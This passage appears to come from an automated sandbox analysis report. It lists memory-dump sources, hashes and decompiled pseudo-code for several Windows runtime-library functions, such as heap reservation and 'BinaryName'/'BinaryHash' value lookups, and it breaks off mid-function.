0x05222e44
0x05222e47
0x05222e4d
0x00000000
0x00000000
0x05222e4f
0x05222e54
0x00000000
0x00000000
0x05222e5a
0x05222e5f
0x05222e9a
0x05222ea4
0x05222ea5
0x05222ea8
0x05222eaf
0x05222eb2
0x05222eb5
0x0527fae9
0x0527faeb
0x0527faed
0x0527faef
0x0527faf7
0x0527faf8
0x0527fafd
0x0527faff
0x0527fb04
0x0527fb04
0x0527faff
0x05222ec0
0x05222ec4
0x05222ec6
0x05222ec8
0x0527fb14
0x0527fb18
0x0527fb1e
0x0527fb21
0x0527fb21
0x05222ece
0x05222ece
0x05222ece
0x05222ed7
0x05222e61
0x05222e63
0x0527fa6b
0x0527fa71
0x0527fa76
0x0527fa78
0x0527fa8a
0x0527fa7a
0x0527fa83
0x0527fa83
0x0527fa8f
0x0527fa91
0x0527fa97
0x0527fa9d
0x0527faa4
0x0527faaa
0x0527faaf
0x0527fab1
0x0527fac3
0x0527fab3
0x0527fabc
0x0527fabc
0x0527fac8
0x0527facb
0x0527fadf
0x0527fadf
0x0527facb
0x0527faa4
0x0527fa91
0x05222e6f
0x05222e6f
0x05222e5f
0x0527fa13
0x0527fa15
0x0527fa17
0x0527fa1f
0x0527fa21
0x0527fa22
0x0527fa25
0x0527fa28
0x0527fa2f
0x0527fa2f
0x0527fa2a
0x0527fa2a
0x0527fa2a
0x0527fa31
0x0527fa34
0x0527fa36
0x0527fa3c
0x0527fa3e
0x0527fa41
0x0527fa43
0x0527fa45
0x0527fa45
0x0527fa41
0x0527fa3c
0x0527fa4a
0x0527fa4f
0x0527fa51
0x0527fa53
0x0527fa56
0x0527fa5b
0x0527fa5e
0x00000000
0x0527fa5e
0x05222e23

Strings

RTL: Re-Waiting, xrefs: 0527FA4A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: a8674f41ef91339f72b52dfebc4016b21a69d736c2bbf9b7e1a0a1019b61e26a
Instruction ID: 4c1e4f3f46f77e0555f57a0811a3b0ee3b62198f23a4ea38b93c0a902ff4a9fd
Opcode Fuzzy Hash: a8674f41ef91339f72b52dfebc4016b21a69d736c2bbf9b7e1a0a1019b61e26a
Instruction Fuzzy Hash: 43613435B2861AEBDB31DF68C984B7EB7A6FF44320F140665E81A972C0DB75A901C781

Uniqueness

Uniqueness Score: -1.00%

Function 052F0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E052F0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E052EFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E052F1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E05269730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E052EA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E052EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x5318b04 >> 0x14) + (_v44 -  *0x5318b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E05247D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E052E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E05247D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E052DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x5318724 & 0x00000008) != 0) {
						E052E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E052F15B5(0x5318ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x052f0eb7
0x052f0eb9
0x052f0ec0
0x052f0ec2
0x052f0ecd
0x052f105b
0x052f105b
0x052f1061
0x052f1066
0x052f1066
0x052f106b
0x052f1073
0x052f1073
0x052f0ed3
0x052f0ed6
0x052f0edc
0x052f0ee0
0x052f0ee7
0x052f0ef0
0x052f0ef5
0x052f0efa
0x052f0efc
0x052f0efd
0x052f0f03
0x052f0f04
0x052f0f06
0x052f0f07
0x052f0f09
0x052f0f0e
0x052f0f14
0x052f0f23
0x052f0f2d
0x052f0f34
0x052f0f34
0x052f0f14
0x052f0f52
0x00000000
0x00000000
0x052f0f58
0x052f0f73
0x052f0f74
0x052f0f79
0x052f0f7d
0x052f0f80
0x052f0f86
0x052f0fab
0x052f0fb5
0x052f0fc6
0x052f0fd1
0x052f0fe3
0x052f0fd3
0x052f0fdc
0x052f0fdc
0x052f0feb
0x052f1009
0x052f1009
0x052f1015
0x052f1027
0x052f1017
0x052f1020
0x052f1020
0x052f102f
0x052f103c
0x052f103c
0x052f1048
0x052f1050
0x052f1050
0x052f1055
0x00000000
0x052f1055
0x052f0f88
0x052f0f9e
0x052f0fa2
0x052f0fa9
0x00000000
0x00000000
0x00000000
0x052f0fa9
0x00000000

Strings

`, xrefs: 052F0F16

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 4762aebc430908e8e0000ed4cc5cfdf9a67318a75c9a3703ed725daac54dd009
Instruction ID: 449b3f3dd6756ade1596ea05cc5821b4b47a0c009a590ee3272aea988ce21b82
Opcode Fuzzy Hash: 4762aebc430908e8e0000ed4cc5cfdf9a67318a75c9a3703ed725daac54dd009
Instruction Fuzzy Hash: ED518F713283429BD315DF28E988B1BB7E5FF84704F440A2CFA5697291DB70E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0525F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0525F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E05244120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E05269830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E05269990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E052695D0();
							goto L11;
						} else {
							_t109 = L05244620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0526F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E052695D0();
										L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0525f0d3
0x0525f0d9
0x0525f0e0
0x0525f0e7
0x0525f0f2
0x0525f0f4
0x0525f0f8
0x0525f100
0x0525f108
0x0525f10d
0x0525f115
0x0525f116
0x0525f11f
0x0525f123
0x0525f124
0x0525f12c
0x0525f130
0x0525f134
0x0525f13d
0x0525f144
0x0525f14b
0x0525f152
0x0529bab0
0x0529bab0
0x0525f158
0x0525f158
0x0525f15a
0x0525f160
0x0525f165
0x0525f166
0x0525f16f
0x0525f173
0x0529baa7
0x0529baa7
0x0529baab
0x00000000
0x0525f179
0x0525f18d
0x0525f191
0x0529baa2
0x00000000
0x0525f197
0x0525f19b
0x0525f1a2
0x0525f1a9
0x0525f1af
0x0525f1b2
0x0525f1b6
0x0525f1b9
0x0525f1c4
0x0525f1d8
0x0525f1df
0x0525f1e3
0x0525f1eb
0x0525f1ee
0x0525f1f4
0x0525f20f
0x0529bab7
0x0529babb
0x0529bacc
0x0529bad1
0x0525f215
0x0525f218
0x0525f226
0x0525f22b
0x00000000
0x0525f22b
0x0525f1f6
0x0525f1f6
0x0525f1f9
0x0525f1fb
0x0525f1fb
0x0525f1f4
0x0525f191
0x0525f173
0x0525f152
0x0525f203

Strings

@, xrefs: 0525F124

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 49e4c0e43b95fbd8aa70c809b9381d6bd8fc78e5b7194898350216c701c2ca2a
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 90519E71614710AFC325DF29C840A6BBBF9FF48710F00892EF99597690E7B4E954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 052A3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E052A3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x531d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E05260BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E052A3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0526FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E052A3540;
						E0526FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0527DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E052B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E052697C0();
					}
					return E0526B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E052A3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E052A3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0526FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E05269650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E052A3787(_a4,  &_v352, _t80);
						}
					}
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E052695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x052a3552
0x052a355a
0x052a355d
0x052a3566
0x052a3567
0x052a357e
0x052a358f
0x052a35a1
0x052a35a5
0x052a366b
0x052a366b
0x052a366d
0x052a3672
0x052a3679
0x052a3685
0x052a368d
0x052a369d
0x052a36a7
0x052a36b8
0x052a36c6
0x052a36c7
0x052a36dc
0x052a36e1
0x052a36e7
0x052a36e9
0x052a36e9
0x052a3703
0x052a3703
0x052a35b5
0x052a35c0
0x052a35c4
0x00000000
0x00000000
0x052a35ca
0x052a35d7
0x052a35e2
0x052a35e6
0x052a35e8
0x052a35f5
0x052a35fa
0x052a3603
0x052a3604
0x052a3609
0x052a360a
0x052a3612
0x052a3613
0x052a361e
0x052a3622
0x052a3628
0x052a362f
0x052a362f
0x052a3636
0x052a3638
0x052a363b
0x052a3642
0x052a3642
0x052a3636
0x052a3657
0x052a3657
0x052a365c
0x052a3662
0x052a3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 052A358F

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 1f0beed466be589cee4b59cc375872319e1b6f4c8c3c5a984ed005f92b7f3a62
Instruction ID: 94df7e1c274fb87f760996ce3efb3b3bbe94d08cc9bdc8c4051ba7379c19e5e9
Opcode Fuzzy Hash: 1f0beed466be589cee4b59cc375872319e1b6f4c8c3c5a984ed005f92b7f3a62
Instruction Fuzzy Hash: CE4121F2D1052DABDB21DA50CC85FEEB77CAF54714F1045A5EA09AB240DB709E888F98

Uniqueness

Uniqueness Score: -1.00%

Function 052F05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E052F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E052F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E05269730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E052EA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E052EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E052F1293(_t79, _v40, E052F07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E05247D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E052E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x052f05c5
0x052f05ca
0x052f05d3
0x052f06db
0x052f06db
0x052f06dd
0x052f06e3
0x052f06e3
0x052f05dd
0x052f05e7
0x052f05f6
0x052f0600
0x052f0607
0x052f0610
0x052f0615
0x052f061a
0x052f061c
0x052f061e
0x052f0624
0x052f0625
0x052f0627
0x052f0628
0x052f0631
0x052f0640
0x052f064d
0x052f0654
0x052f0654
0x052f0631
0x052f066d
0x052f0674
0x00000000
0x00000000
0x052f0692
0x052f069e
0x052f06b0
0x052f06a0
0x052f06a9
0x052f06a9
0x052f06b8
0x052f06d6
0x052f06d6
0x00000000

Strings

`, xrefs: 052F0633

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 5a34e14f2d8bf3a5052ef14c80fbc869bdeae6ac7433564c323c9af9af164e46
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 99310032314346ABE720DE26DD88F9AB799BF84754F044238FA5A9B281D770E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 052A3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E052A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E05269650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L05244620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E05269650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x052a3893
0x052a3896
0x052a3899
0x052a389f
0x052a38a0
0x052a38a4
0x052a38a9
0x052a38ac
0x052a38ad
0x052a38ae
0x052a38af
0x052a38b1
0x052a38b4
0x052a38bb
0x052a38bc
0x052a38bd
0x052a38c4
0x052a38c8
0x052a38ca
0x052a38ca
0x052a38d5
0x052a393e
0x052a3940
0x052a3942
0x052a3952
0x052a3954
0x052a3961
0x052a3961
0x052a3967
0x052a396e
0x052a396e
0x052a3947
0x052a394c
0x00000000
0x052a394c
0x052a38ea
0x052a38ee
0x052a38f8
0x052a38f9
0x052a38ff
0x052a3900
0x052a3902
0x052a3903
0x052a390b
0x052a390f
0x052a3950
0x00000000
0x052a3950
0x052a3915
0x052a391d
0x052a391d
0x052a3922
0x052a3926
0x00000000
0x052a3928
0x052a392b
0x052a392b
0x052a3935
0x052a3937
0x052a3937
0x00000000
0x052a3935
0x052a3926
0x052a38f0
0x00000000

Strings

BinaryName, xrefs: 052A38B4

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 89374c17fd720fe5385d760b3826dfca8028d230cdcb274d09c578ab9aa853c0
Instruction ID: a8e719bcb786f0bbf3eddd26a0aecfbc94f1d018137b459c5d6814f273ecc011
Opcode Fuzzy Hash: 89374c17fd720fe5385d760b3826dfca8028d230cdcb274d09c578ab9aa853c0
Instruction Fuzzy Hash: F3310133A2560BAFDB15DA58C985E7BF775FF90B20F014569E919A7280D7309E04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0525D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0525D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x531d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E05244120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0526B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E052698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E052695D0();
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0525d29c
0x0525d2a6
0x0525d2b1
0x0525d2b5
0x0525d2b6
0x0525d2bc
0x0525d2bd
0x0525d2be
0x0525d2bf
0x0525d2c2
0x0525d2c4
0x0525d2cc
0x0525d384
0x0525d34b
0x0525d34f
0x0525d350
0x0525d351
0x0525d35c
0x0525d35c
0x0525d2d6
0x0525d2da
0x0525d2e1
0x0525d361
0x0525d369
0x0525d36d
0x0525d2e3
0x0525d2e3
0x0525d2e3
0x0525d2e5
0x0525d2ed
0x0525d2f5
0x0525d2fa
0x0525d302
0x0525d303
0x0525d30b
0x0525d30f
0x0525d313
0x0525d318
0x0525d31c
0x0525d320
0x0525d379
0x0525d37d
0x00000000
0x00000000
0x0529affe
0x0529b001
0x0529b011
0x00000000
0x0525d322
0x0525d322
0x0525d330
0x0525d337
0x0525d35d
0x0525d339
0x0525d33f
0x0525d38c
0x0525d38c
0x0525d33f
0x0525d349
0x00000000
0x0525d349

Strings

@, xrefs: 0525D303

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9da9329123324e8470853b20a703069c09149c9f5cef2ba99445df8dc687a47d
Instruction ID: 14131d7cf60e6decae699d234dccd56b9c79666f8790279adecab5a6500178ea
Opcode Fuzzy Hash: 9da9329123324e8470853b20a703069c09149c9f5cef2ba99445df8dc687a47d
Instruction Fuzzy Hash: D531C2B1669305AFC715DF28C884A6BBBE9FF85664F00092EFA9583250D734DE04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 05231B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05231B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0526BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0526A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
